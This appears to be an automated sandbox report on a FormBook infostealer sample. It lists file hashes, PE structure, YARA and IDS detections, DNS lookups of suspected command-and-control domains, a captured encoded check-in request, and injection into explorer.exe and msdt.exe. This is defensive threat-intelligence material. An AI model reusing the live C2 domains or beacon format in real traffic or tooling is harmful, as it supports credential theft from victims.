                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.847097424496743
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:S9yf6BkjhTQUbHE.exe
                                                        File size:446976
                                                        MD5:812861ad5cbb91bfa01a6a15c2cef128
                                                        SHA1:ca092e52319047d609cb6fcca1821a8f873416df
                                                        SHA256:a649d216b55b0f0597a16690b8469b6b44b9cdc73560d8237387b2df225ab20b
                                                        SHA512:67f95b15cf249be43324f73de874fc5ca2f2b1d7255c1bb99b6d103b8d9c7414ebbf3ce1bdf7bb9df225c020d79836985c89fa687049892fa6323c535579e05d
                                                        SSDEEP:12288:iDW+U0QixBFmqI9AY9aVrwRn+BbxGmG5tquMAQ52RJeHEO:iDvU0Qi1hIhaVASx85tquMAQ52HdO
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QM.a..............0.............v.... ........@.. .......................@............@................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x46e776
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x619F4D51 [Thu Nov 25 08:46:09 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [ebp+0800000Eh], ch
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6e7240x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x5c4.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x6c78c0x6c800False0.884828629032data7.85954100497IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x700000x5c40x600False0.4296875data4.13698409708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x720000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_VERSION0x700900x334data
                                                        RT_MANIFEST0x703d40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyrightCopyright Rogers Peet
                                                        Assembly Version8.0.6.0
                                                        InternalNameInAttribu.exe
                                                        FileVersion5.6.0.0
                                                        CompanyNameRogers Peet
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameBiblan
                                                        ProductVersion5.6.0.0
                                                        FileDescriptionBiblan
                                                        OriginalFilenameInAttribu.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        11/25/21-15:14:49.156551TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.534.117.168.233
                                                        11/25/21-15:14:49.156551TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.534.117.168.233
                                                        11/25/21-15:14:49.156551TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.534.117.168.233
                                                        11/25/21-15:15:02.896670TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983780192.168.2.5198.54.117.218
                                                        11/25/21-15:15:02.896670TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983780192.168.2.5198.54.117.218
                                                        11/25/21-15:15:02.896670TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983780192.168.2.5198.54.117.218

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 25, 2021 15:14:01.519339085 CET4981880192.168.2.523.106.123.249
                                                        Nov 25, 2021 15:14:04.525531054 CET4981880192.168.2.523.106.123.249
                                                        Nov 25, 2021 15:14:10.526567936 CET4981880192.168.2.523.106.123.249
                                                        Nov 25, 2021 15:14:25.683936119 CET4982480192.168.2.523.106.123.249
                                                        Nov 25, 2021 15:14:27.669626951 CET4982580192.168.2.5172.67.178.31
                                                        Nov 25, 2021 15:14:27.703460932 CET8049825172.67.178.31192.168.2.5
                                                        Nov 25, 2021 15:14:27.703563929 CET4982580192.168.2.5172.67.178.31
                                                        Nov 25, 2021 15:14:27.703845978 CET4982580192.168.2.5172.67.178.31
                                                        Nov 25, 2021 15:14:27.733259916 CET8049825172.67.178.31192.168.2.5
                                                        Nov 25, 2021 15:14:27.778224945 CET8049825172.67.178.31192.168.2.5
                                                        Nov 25, 2021 15:14:27.778455019 CET8049825172.67.178.31192.168.2.5
                                                        Nov 25, 2021 15:14:27.778503895 CET4982580192.168.2.5172.67.178.31
                                                        Nov 25, 2021 15:14:27.778527975 CET4982580192.168.2.5172.67.178.31
                                                        Nov 25, 2021 15:14:27.807986975 CET8049825172.67.178.31192.168.2.5
                                                        Nov 25, 2021 15:14:28.699433088 CET4982480192.168.2.523.106.123.249
                                                        Nov 25, 2021 15:14:34.700012922 CET4982480192.168.2.523.106.123.249

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 25, 2021 15:13:46.186501980 CET5501653192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:13:46.241841078 CET53550168.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:13:51.264303923 CET5712853192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:13:51.343818903 CET53571288.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:13:56.359602928 CET5479153192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:13:56.414275885 CET53547918.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:14:01.449800968 CET5039453192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:14:01.513969898 CET53503948.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:14:25.505644083 CET5381353192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:14:25.582798958 CET53538138.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:14:27.600068092 CET6373253192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:14:27.668248892 CET53637328.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:14:32.799489021 CET5734453192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:14:32.882380962 CET53573448.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:14:37.889867067 CET5445053192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:14:37.956604958 CET53544508.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:14:43.999562979 CET5926153192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:14:44.050005913 CET53592618.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:14:49.062454939 CET5715153192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:14:49.133816957 CET53571518.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:14:54.248440027 CET5643253192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:14:54.410651922 CET53564328.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:15:02.666291952 CET6237253192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:15:02.729429960 CET53623728.8.8.8192.168.2.5
                                                        Nov 25, 2021 15:15:08.072524071 CET6151553192.168.2.58.8.8.8
                                                        Nov 25, 2021 15:15:08.158160925 CET53615158.8.8.8192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Nov 25, 2021 15:13:46.186501980 CET192.168.2.58.8.8.80x5f4fStandard query (0)www.epubgame.netA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:13:51.264303923 CET192.168.2.58.8.8.80xabacStandard query (0)www.fuslonnd.comA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:13:56.359602928 CET192.168.2.58.8.8.80xd8e9Standard query (0)www.annellata.xyzA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:01.449800968 CET192.168.2.58.8.8.80xaf65Standard query (0)www.xn----pl8a630b0whm6t.comA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:25.505644083 CET192.168.2.58.8.8.80xfd5fStandard query (0)www.xn----pl8a630b0whm6t.comA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:27.600068092 CET192.168.2.58.8.8.80x7843Standard query (0)www.anamentor.comA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:32.799489021 CET192.168.2.58.8.8.80x9ebdStandard query (0)www.metricwombat.comA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:37.889867067 CET192.168.2.58.8.8.80xc5e9Standard query (0)www.cryptoentering.comA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:43.999562979 CET192.168.2.58.8.8.80x63f6Standard query (0)www.dock-weiler.comA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:49.062454939 CET192.168.2.58.8.8.80xb316Standard query (0)www.peregorodki.storeA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:54.248440027 CET192.168.2.58.8.8.80xc76eStandard query (0)www.ichelbrousset.comA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:15:02.666291952 CET192.168.2.58.8.8.80x6e0fStandard query (0)www.exploitslozdz.xyzA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:15:08.072524071 CET192.168.2.58.8.8.80x5d8aStandard query (0)www.fullerhomeloans.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Nov 25, 2021 15:13:46.241841078 CET8.8.8.8192.168.2.50x5f4fName error (3)www.epubgame.netnonenoneA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:13:51.343818903 CET8.8.8.8192.168.2.50xabacName error (3)www.fuslonnd.comnonenoneA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:13:56.414275885 CET8.8.8.8192.168.2.50xd8e9Name error (3)www.annellata.xyznonenoneA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:01.513969898 CET8.8.8.8192.168.2.50xaf65No error (0)www.xn----pl8a630b0whm6t.com23.106.123.249A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:25.582798958 CET8.8.8.8192.168.2.50xfd5fNo error (0)www.xn----pl8a630b0whm6t.com23.106.123.249A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:27.668248892 CET8.8.8.8192.168.2.50x7843No error (0)www.anamentor.com172.67.178.31A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:27.668248892 CET8.8.8.8192.168.2.50x7843No error (0)www.anamentor.com104.21.51.95A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:32.882380962 CET8.8.8.8192.168.2.50x9ebdName error (3)www.metricwombat.comnonenoneA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:37.956604958 CET8.8.8.8192.168.2.50xc5e9No error (0)www.cryptoentering.comcryptoentering.comCNAME (Canonical name)IN (0x0001)
                                                        Nov 25, 2021 15:14:37.956604958 CET8.8.8.8192.168.2.50xc5e9No error (0)cryptoentering.com127.0.0.1A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:44.050005913 CET8.8.8.8192.168.2.50x63f6Name error (3)www.dock-weiler.comnonenoneA (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:49.133816957 CET8.8.8.8192.168.2.50xb316No error (0)www.peregorodki.storegcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                        Nov 25, 2021 15:14:49.133816957 CET8.8.8.8192.168.2.50xb316No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                        Nov 25, 2021 15:14:49.133816957 CET8.8.8.8192.168.2.50xb316No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:14:54.410651922 CET8.8.8.8192.168.2.50xc76eNo error (0)www.ichelbrousset.com209.17.116.163A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:15:02.729429960 CET8.8.8.8192.168.2.50x6e0fNo error (0)www.exploitslozdz.xyzparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                        Nov 25, 2021 15:15:02.729429960 CET8.8.8.8192.168.2.50x6e0fNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:15:02.729429960 CET8.8.8.8192.168.2.50x6e0fNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:15:02.729429960 CET8.8.8.8192.168.2.50x6e0fNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:15:02.729429960 CET8.8.8.8192.168.2.50x6e0fNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:15:02.729429960 CET8.8.8.8192.168.2.50x6e0fNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:15:02.729429960 CET8.8.8.8192.168.2.50x6e0fNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:15:02.729429960 CET8.8.8.8192.168.2.50x6e0fNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                        Nov 25, 2021 15:15:08.158160925 CET8.8.8.8192.168.2.50x5d8aName error (3)www.fullerhomeloans.comnonenoneA (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.anamentor.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.549825172.67.178.3180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 25, 2021 15:14:27.703845978 CET11243OUTGET /czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-L HTTP/1.1
                                                        Host: www.anamentor.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Nov 25, 2021 15:14:27.778224945 CET11244INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 25 Nov 2021 14:14:27 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: max-age=3600
                                                        Expires: Thu, 25 Nov 2021 15:14:27 GMT
                                                        Location: https://www.anamentor.com/czh8/?7n=IRLjoLIXlWieDd548KoJS/rowvlX7n5q7mSRLwbc7H8jLvnjYG+pwFiMTHdBlEYfNNBf&t4b=Zn-L
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RzIWNo2qqeDFO2t1MpA%2FOdaqEXCSt3i%2FGZmLkcZpm6f76Mci07Yzcq5ZRvSRwDOez1hTdzS4aWfPMe8ywl3LNUDv%2B4Z%2Fh5hPMNAVAwFYiHWORPRPU5x6BxLWPT9j1tYPoJT5TQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        X-Content-Type-Options: nosniff
                                                        Server: cloudflare
                                                        CF-RAY: 6b3b7bc73b736b36-AMS
                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Start time:15:12:27
                                                        Start date:25/11/2021
                                                        Path:C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe"
                                                        Imagebase:0xa80000
                                                        File size:446976 bytes
                                                        MD5 hash:812861AD5CBB91BFA01A6A15C2CEF128
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.256688867.00000000041A8000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254291450.000000000304A000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.254885571.0000000003F8D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254094379.0000000002F81000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:low

                                                        General

                                                        Start time:15:12:30
                                                        Start date:25/11/2021
                                                        Path:C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\S9yf6BkjhTQUbHE.exe
                                                        Imagebase:0x450000
                                                        File size:446976 bytes
                                                        MD5 hash:812861AD5CBB91BFA01A6A15C2CEF128
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.250860288.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.314889663.0000000000A20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.251285298.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.314919624.0000000000A50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:15:12:33
                                                        Start date:25/11/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff693d90000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.288279316.000000000EC4A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.305725796.000000000EC4A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:high

                                                        General

                                                        Start time:15:12:58
                                                        Start date:25/11/2021
                                                        Path:C:\Windows\SysWOW64\autoconv.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                        Imagebase:0x1080000
                                                        File size:851968 bytes
                                                        MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:15:12:58
                                                        Start date:25/11/2021
                                                        Path:C:\Windows\SysWOW64\msdt.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\msdt.exe
                                                        Imagebase:0x9f0000
                                                        File size:1508352 bytes
                                                        MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.518773545.0000000002FA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.518592905.0000000002E90000.00000040.00020000.sdmp, Author: Joe Security
